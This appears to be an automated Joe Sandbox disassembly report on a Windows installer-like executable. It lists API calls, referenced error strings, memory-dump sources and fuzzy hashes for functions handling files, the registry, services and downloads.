                                                                                                                                                                                                                                                                                                  • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\$crypt32.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 3397690329-3978359083
                                                                                                                                                                                                                                                                                                  • Opcode ID: 469c8f3ce63db4ded039a421f05abc7ebecf5a9778d76d6f17f10984df01b2dd
                                                                                                                                                                                                                                                                                                  • Instruction ID: ce314f248b24d5a69c9ac8d4313996a1873db4a79e83d00ddf4089c4a47d9bc5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 469c8f3ce63db4ded039a421f05abc7ebecf5a9778d76d6f17f10984df01b2dd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C131E231902209EBEF20AF88CC41EBEB774FF85710F14907AE901EA941E3B19E40CB54
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(00000000,00864DBC,00000000,?,?,00000000,?,008A412D,00000000,00864DBC,00000000,00000000,?,008785EE,?,?), ref: 008A4033
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,008A412D,00000000,00864DBC,00000000,00000000,?,008785EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 008A4041
                                                                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(00000000,00864DBC,00000000,00864DBC,00000000,?,008A412D,00000000,00864DBC,00000000,00000000,?,008785EE,?,?,00000001), ref: 008A40AC
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,008A412D,00000000,00864DBC,00000000,00000000,?,008785EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 008A40B6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CopyErrorFileLast
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 374144340-2967768451
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3b72102354227f1cffbcb6d3ba1dc35bf38c5e92a317610c9102b2f6e551ed75
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0fde7b2b9dab0a71a8e14b0accb4f2075a8faff19429432a03bb141342fd5cf1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b72102354227f1cffbcb6d3ba1dc35bf38c5e92a317610c9102b2f6e551ed75
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91210736600B3697FF700AA94C40B3B6A98FF93B60B156136FF05DB911E7E18C40A2E1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0086EF56
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4153: SetFileAttributesW.KERNEL32(0088923A,00000080,00000000,0088923A,000000FF,00000000,?,?,0088923A), ref: 008A4182
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4153: GetLastError.KERNEL32(?,?,0088923A), ref: 008A418C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863C6B: RemoveDirectoryW.KERNEL32(00000001,00000000,00000000,00000000,?,?,0086EFA1,00000001,00000000,00000095,00000001,00870663,00000095,00000000,swidtag,00000001), ref: 00863C88
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • swidtag, xrefs: 0086EF65
                                                                                                                                                                                                                                                                                                  • Failed to allocate regid folder path., xrefs: 0086EFBC
                                                                                                                                                                                                                                                                                                  • Failed to allocate regid file path., xrefs: 0086EFB5
                                                                                                                                                                                                                                                                                                  • Failed to format tag folder path., xrefs: 0086EFC3
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AttributesDirectoryErrorFileLastOpen@16Remove
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to format tag folder path.$swidtag
                                                                                                                                                                                                                                                                                                  • API String ID: 1428973842-4170906717
                                                                                                                                                                                                                                                                                                  • Opcode ID: fa393b3121cd331dea08ad3932a1032115fa72d680c66f492524ff51b16de484
                                                                                                                                                                                                                                                                                                  • Instruction ID: 544f305f12ec01f4b9a98bc85b9fc2767e9e2a54d1d4976b40ab2df96cf4fbb4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa393b3121cd331dea08ad3932a1032115fa72d680c66f492524ff51b16de484
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0217635D00518FBDF11EB99CC41AAEFBB5FF44710F1280A6F414FA2A1DB719A81AB91
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0F6C: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,008CAAA0,00000000,?,008A57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008A0F80
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,?,000000FF,00000000,00000000,00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4), ref: 00888E3A
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4,?,?,?,0086F7E0,00000001,00000100,000001B4,00000000), ref: 00888E88
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to enumerate uninstall key for related bundles., xrefs: 00888E99
                                                                                                                                                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00888DD7
                                                                                                                                                                                                                                                                                                  • Failed to open uninstall registry key., xrefs: 00888DFD
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCompareOpenString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                                                                                                                                                  • API String ID: 2817536665-2531018330
                                                                                                                                                                                                                                                                                                  • Opcode ID: bf451b90c1c15cdd60d16a60f1fcd31ba65542b02d081e1bdc9567b2ebb43ec9
                                                                                                                                                                                                                                                                                                  • Instruction ID: 758e8440697e4481c73766b7f4daa81089e5ed19734ec1f951064274c0348eff
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf451b90c1c15cdd60d16a60f1fcd31ba65542b02d081e1bdc9567b2ebb43ec9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2218336900228FEEB21BA94CC46BEEBA69FF00720F644664F510F6150DB755E90E791
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 008A3309
                                                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 008A3325
                                                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 008A33AC
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A33B7
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 760788290-1270936966
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1c35b0ae8191497160828fd4c3d6bba784d2ecc2e124fff3776e4f75acfb6206
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1eda035b73a3004442071122a1e2da00538793569315f54b8d9a1d7ebb442098
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c35b0ae8191497160828fd4c3d6bba784d2ecc2e124fff3776e4f75acfb6206
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83217E31905219AFDF119B94D848EAEBBB9FF46715F1501A8F901EB710DB319E008B90
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0088D2EE
                                                                                                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(?), ref: 0088D31C
                                                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 0088D325
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate buffer.$NetFxChainer.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 944053411-3611226795
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1f9cecdb208fb1ebc7dabc3e7d00256148b6c2dec554ff2447bb8b07e7a8ae04
                                                                                                                                                                                                                                                                                                  • Instruction ID: 97ed14763ba87cf1228e8ba2b383838db716e7168b6e77cd4588a7313790bcc4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f9cecdb208fb1ebc7dabc3e7d00256148b6c2dec554ff2447bb8b07e7a8ae04
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6921B2B460070AFFDB10AF68D845A99BBF5FF48324F108629F964E7392C771E9508B91
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000001,00000000,?,?,00886B11,00000000,?), ref: 008A591D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00886B11,00000000,?,?,?,?,?,?,?,?,?,00886F28,?,?), ref: 008A592B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,00886B11,00000000,?), ref: 008A5965
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00886B11,00000000,?,?,?,?,?,?,?,?,?,00886F28,?,?), ref: 008A596F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ConfigErrorHeapLastQueryService$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID: svcutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 355237494-1746323212
                                                                                                                                                                                                                                                                                                  • Opcode ID: 21ce8758add20a2a22dadaf2113e4a44f78fca9ebcdd8fe5eaf1c5dd09bf538b
                                                                                                                                                                                                                                                                                                  • Instruction ID: b572a9655fdd0dec5efba79e25d74537513d63a978fdab0cc46204652094178a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21ce8758add20a2a22dadaf2113e4a44f78fca9ebcdd8fe5eaf1c5dd09bf538b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68210132941A39FBF7215A95AC05B9FAE69FB42B70F1A4020FD08EF601E661CD4096E1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _memcpy_s
                                                                                                                                                                                                                                                                                                  • String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$condition.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2001391462-1605196437
                                                                                                                                                                                                                                                                                                  • Opcode ID: 253e292c37c4be8abe6f2d88bfa78fea59e41ebe6cbea6d1438b83ea95d170c3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 753792835a69dce3b6b7db04ecf0af49a5fcd3bd71f7ebbb03648c4b8a0fcc10
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 253e292c37c4be8abe6f2d88bfa78fea59e41ebe6cbea6d1438b83ea95d170c3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB11C432580324BBEF25296C9C86E963A1CFF17761F064171F950EFAD6CA72C910C6E2
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00869E38
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to set variable., xrefs: 00869E97
                                                                                                                                                                                                                                                                                                  • Failed get file version., xrefs: 00869E78
                                                                                                                                                                                                                                                                                                  • Failed to format path string., xrefs: 00869E43
                                                                                                                                                                                                                                                                                                  • File search: %ls, did not find path: %ls, xrefs: 00869EA3
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Open@16
                                                                                                                                                                                                                                                                                                  • String ID: Failed get file version.$Failed to format path string.$Failed to set variable.$File search: %ls, did not find path: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 3613110473-2458530209
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3fb0ebe1e6a7f2e4216754c5b0f8a5131dafc2007d177b9add9fe24b72b529be
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6e6371f9af28727402fd885d0bb28efb255d9139183d33c0980a76195693c028
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fb0ebe1e6a7f2e4216754c5b0f8a5131dafc2007d177b9add9fe24b72b529be
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B118E32D40129BA9B02AAD88D82CAEBB6DFF14754F124166F910E6250D6765E10ABD1
APIs
  • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
  • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
• CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,?,?,00878E17,0000001A,00000000,?,00000000,00000000), ref: 00878258
• GetLastError.KERNEL32(?,?,00878E17,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 00878262
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: Heap$AllocateCreateErrorKnownLastProcessWell
• String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$cache.cpp
• API String ID: 2186923214-2110050797
APIs
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000003E8,000004FF), ref: 0088DDCE
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088DDF8
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0088DFC8,00000000,?,?,?,?,00000000), ref: 0088DE00
Strings
• Failed while waiting for download., xrefs: 0088DE2E
• bitsengine.cpp, xrefs: 0088DE24
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: ErrorLastMessageMultipleObjectsPeekWait
• String ID: Failed while waiting for download.$bitsengine.cpp
• API String ID: 435350009-228655868
APIs
• ShellExecuteExW.SHELL32(?), ref: 008A3CC0
• GetLastError.KERNEL32(?,?,00000000), ref: 008A3CCA
• CloseHandle.KERNEL32(?,?,?,00000000), ref: 008A3CFD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: CloseErrorExecuteHandleLastShell
• String ID: <$shelutil.cpp
• API String ID: 3023784893-3991740012
APIs
• GetComputerNameW.KERNEL32(?,00000010), ref: 00865F5C
• GetLastError.KERNEL32 ref: 00865F66
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: ComputerErrorLastName
• String ID: Failed to get computer name.$Failed to set variant value.$variable.cpp
• API String ID: 3560734967-484636765
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00869AC4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Condition, xrefs: 00869A5F
                                                                                                                                                                                                                                                                                                  • Failed to copy condition string from BSTR, xrefs: 00869AAE
                                                                                                                                                                                                                                                                                                  • Failed to get Condition inner text., xrefs: 00869A94
                                                                                                                                                                                                                                                                                                  • Failed to select condition node., xrefs: 00869A7B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                                                                                                                                                  • String ID: Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.
                                                                                                                                                                                                                                                                                                  • API String ID: 3341692771-3600577998
                                                                                                                                                                                                                                                                                                  • Opcode ID: e55612e986e222fa871854e7eaa5617ff9ecb24c8505bc5ab1d4433d25576c86
                                                                                                                                                                                                                                                                                                  • Instruction ID: f501b3fd283c056ebf5f23f4819aae752959055ef3b91a68079632d8a8950402
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e55612e986e222fa871854e7eaa5617ff9ecb24c8505bc5ab1d4433d25576c86
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A118E31941238BBEB129A94CD06FADBBADFB01722F124255FC41EA690CBB59E00D681
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 008667E3
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008667ED
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastPathTemp
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get temp path.$Failed to set variant value.$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1238063741-2915113195
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2c7b8dafe2df43d72cd26a40b07dd8aef786f60a8b22fe40689f22cbac0fa14f
